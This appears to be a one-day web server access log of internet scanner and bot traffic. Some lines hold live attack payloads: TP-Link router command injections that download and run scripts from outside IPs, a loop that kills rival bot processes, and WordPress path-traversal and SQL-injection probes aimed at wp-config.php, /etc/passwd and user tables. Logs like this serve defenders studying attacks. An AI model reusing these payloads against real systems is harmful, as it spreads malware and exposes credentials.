149.50.103.48 - - [21/Jul/2024:02:12:40 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 172.168.41.227 - - [21/Jul/2024:02:14:31 +0200] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 185.191.126.213 - - [21/Jul/2024:02:19:06 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 141.98.11.189 - - [21/Jul/2024:02:21:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 95.214.27.253 - - [21/Jul/2024:02:28:45 +0200] "GET /cgi-bin/luci/ HTTP/1.1" 404 358 "-" "-" 185.242.226.10 - - [21/Jul/2024:02:34:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 84.54.51.37 - - [21/Jul/2024:02:43:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 115.231.78.9 - - [21/Jul/2024:02:43:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 115.231.78.9 - - [21/Jul/2024:02:43:27 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 115.231.78.9 - - [21/Jul/2024:02:43:28 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 45.148.10.202 - - [21/Jul/2024:02:44:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 3.8.152.246 - - [21/Jul/2024:03:15:47 +0200] "\x0c\xcb\x8c\x13\x84\xf17\xef`\x10\x04\xb0\x1b\xf1" 400 383 "-" "-" 149.50.103.48 - - [21/Jul/2024:03:17:56 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 87.255.195.75 - - [21/Jul/2024:03:19:33 +0200] "GET /webui/ HTTP/1.1" 404 281 "-" "python-requests/2.27.1" 198.235.24.86 - - [21/Jul/2024:03:24:17 +0200] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.86 - - [21/Jul/2024:03:24:18 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:03:24:21 +0200] "\x16\x03\x01" 400 383 "-" "-" 45.148.10.202 - - [21/Jul/2024:03:24:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.202 - - [21/Jul/2024:03:24:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 47.128.32.33 - - [21/Jul/2024:03:24:58 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 3.8.152.246 - - [21/Jul/2024:03:28:56 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:03:30:47 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:03:33:08 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.180.136.106 - - [21/Jul/2024:03:33:53 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.4450.1929 Mobile Safari/537.36" 3.8.152.246 - - [21/Jul/2024:03:35:06 +0200] "GET /manage/account/login HTTP/1.1" 404 291 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:03:39:30 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:03:41:41 +0200] "GET /admin/index.html HTTP/1.1" 404 287 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 185.224.128.43 - - [21/Jul/2024:03:44:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 3.8.152.246 - - [21/Jul/2024:03:46:06 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:03:48:03 +0200] "GET /index.html HTTP/1.1" 404 283 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:03:52:34 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:03:54:33 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 290 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:03:58:23 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:04:00:14 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:04:03:44 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:04:05:36 +0200] "GET /logon.htm HTTP/1.1" 404 283 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:04:09:15 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:04:11:02 +0200] "GET /login.jsp HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:04:13:51 +0200] "\x16\x03\x01" 400 383 "-" "-" 177.126.59.125 - - [21/Jul/2024:04:15:42 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 3.8.152.246 - - [21/Jul/2024:04:15:42 +0200] "GET /doc/index.html HTTP/1.1" 404 286 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 3.8.152.246 - - [21/Jul/2024:04:19:06 +0200] "\x16\x03\x01" 400 383 "-" "-" 3.8.152.246 - - [21/Jul/2024:04:20:58 +0200] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'" 149.50.103.48 - - [21/Jul/2024:04:21:25 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 80.66.76.121 - - [21/Jul/2024:04:55:26 +0200] "\x03" 400 383 "-" "-" 84.54.51.37 - - [21/Jul/2024:05:16:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 84.238.242.213 - - [21/Jul/2024:05:32:13 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 93.174.93.12 - - [21/Jul/2024:05:36:31 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 94.156.68.162 - - [21/Jul/2024:05:56:27 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0" 141.98.11.189 - - [21/Jul/2024:05:56:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 94.156.68.162 - - [21/Jul/2024:06:00:41 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 9; LM-G710VM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" 141.98.11.189 - - [21/Jul/2024:06:31:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 89.172.1.26 - - [21/Jul/2024:06:45:41 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.82.77.202 - - [21/Jul/2024:06:48:22 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 149.50.103.48 - - [21/Jul/2024:07:26:38 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 93.174.93.12 - - [21/Jul/2024:08:12:39 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 178.199.119.70 - - [21/Jul/2024:08:25:50 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" 45.148.10.202 - - [21/Jul/2024:08:30:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 5.8.11.202 - - [21/Jul/2024:08:30:46 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 46.101.6.185 - - [21/Jul/2024:08:39:45 +0200] "GET /modules/simpleimportproduct/views/js/error.js HTTP/1.1" 404 410 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 92.249.48.202 - - [21/Jul/2024:08:41:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 15.204.207.175 - - [21/Jul/2024:08:45:45 +0200] "GET /_fragment HTTP/1.1" 404 291 "-" "Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0" 46.174.191.30 - - [21/Jul/2024:09:11:31 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 188.166.173.199 - - [21/Jul/2024:09:16:20 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 194.38.23.16 - - [21/Jul/2024:10:08:16 +0200] "GET /jqueryupload/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 398 "-" "ALittle Client" 194.38.23.16 - - [21/Jul/2024:10:08:19 +0200] "GET /jqueryupload/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 385 "-" "ALittle Client" 40.160.12.147 - - [21/Jul/2024:11:00:42 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 45.148.10.202 - - [21/Jul/2024:11:23:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.202 - - [21/Jul/2024:11:23:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 3.139.78.150 - - [21/Jul/2024:11:26:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPad; CPU OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/79.0.259819395 Mobile/17A5556d Safari/604.1" 141.98.11.189 - - [21/Jul/2024:12:09:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 51.255.109.171 - - [21/Jul/2024:12:22:52 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 149.50.103.48 - - [21/Jul/2024:12:25:20 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 94.156.68.162 - - [21/Jul/2024:12:44:40 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; Nokia 7.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36" 94.156.68.162 - - [21/Jul/2024:12:44:56 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15" 174.138.29.28 - - [21/Jul/2024:12:57:01 +0200] "POST /wp-login.php HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 174.138.29.28 - - [21/Jul/2024:12:57:02 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 212.41.9.51 - - [21/Jul/2024:13:11:00 +0200] "GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15 OPX/2.4.1" 212.41.9.51 - - [21/Jul/2024:13:11:01 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" 212.41.9.51 - - [21/Jul/2024:13:11:02 +0200] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:99.0) Gecko/20100101 Firefox/99.0" 212.41.9.51 - - [21/Jul/2024:13:11:02 +0200] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" 212.41.9.51 - - [21/Jul/2024:13:11:02 +0200] "GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0" 212.41.9.51 - - [21/Jul/2024:13:11:04 +0200] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/25.0.0 Version/17.4.1 Safari/605.1.15" 34.78.249.41 - - [21/Jul/2024:13:22:58 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2" 185.224.128.43 - - [21/Jul/2024:13:33:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 64.62.197.195 - - [21/Jul/2024:13:35:49 +0200] "\x16\x03\x01" 400 383 "-" "-" 20.237.235.106 - - [21/Jul/2024:13:54:21 +0200] "GET echo -e" 400 383 "-" "-" 92.249.48.202 - - [21/Jul/2024:14:00:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 83.97.73.245 - - [21/Jul/2024:14:11:20 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 40.83.151.240 - - [21/Jul/2024:14:56:16 +0200] "GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd%20/tmp%20wget%20http://212.192.241.72/lolol.sh%20curl%20-O http://212.192.241.72/lolol.sh%20sh%20/tmp/kh%27$/lolol.sh" 400 383 "-" "-" 5.8.11.202 - - [21/Jul/2024:15:20:05 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36" 47.128.49.105 - - [21/Jul/2024:15:23:03 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 45.32.103.40 - - [21/Jul/2024:15:26:33 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.5158.1612 Mobile Safari/537.36" 47.128.119.166 - - [21/Jul/2024:15:27:15 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 207.148.69.107 - - [21/Jul/2024:15:27:36 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.9454.1498 Mobile Safari/537.36" 83.97.73.245 - - [21/Jul/2024:15:34:26 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.148.10.202 - - [21/Jul/2024:15:35:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 35.203.211.116 - - [21/Jul/2024:15:36:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 194.55.186.249 - - [21/Jul/2024:15:36:20 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.55.186.249 - - [21/Jul/2024:15:38:26 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" 80.82.77.202 - - [21/Jul/2024:16:00:14 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36" 212.87.212.46 - - [21/Jul/2024:16:05:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 167.94.145.108 - - [21/Jul/2024:17:33:09 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.94.145.108 - - [21/Jul/2024:17:33:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.108 - - [21/Jul/2024:17:33:12 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.108 - - [21/Jul/2024:17:33:12 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.108 - - [21/Jul/2024:17:33:13 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 109.222.156.216 - - [21/Jul/2024:17:46:20 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 167.172.172.183 - - [21/Jul/2024:18:36:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43" 94.156.68.162 - - [21/Jul/2024:18:40:29 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 94.156.68.162 - - [21/Jul/2024:18:41:04 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/76.0.3809.100 Chrome/76.0.3809.100 Safari/537.36" 185.224.128.43 - - [21/Jul/2024:18:44:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 45.148.10.202 - - [21/Jul/2024:19:09:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.202 - - [21/Jul/2024:19:09:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.156.128.37 - - [21/Jul/2024:19:09:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 87.251.64.129 - - [21/Jul/2024:19:09:20 +0200] "\x03" 400 383 "-" "-" 149.50.103.48 - - [21/Jul/2024:19:09:28 +0200] "GET / HTTP/1.1" 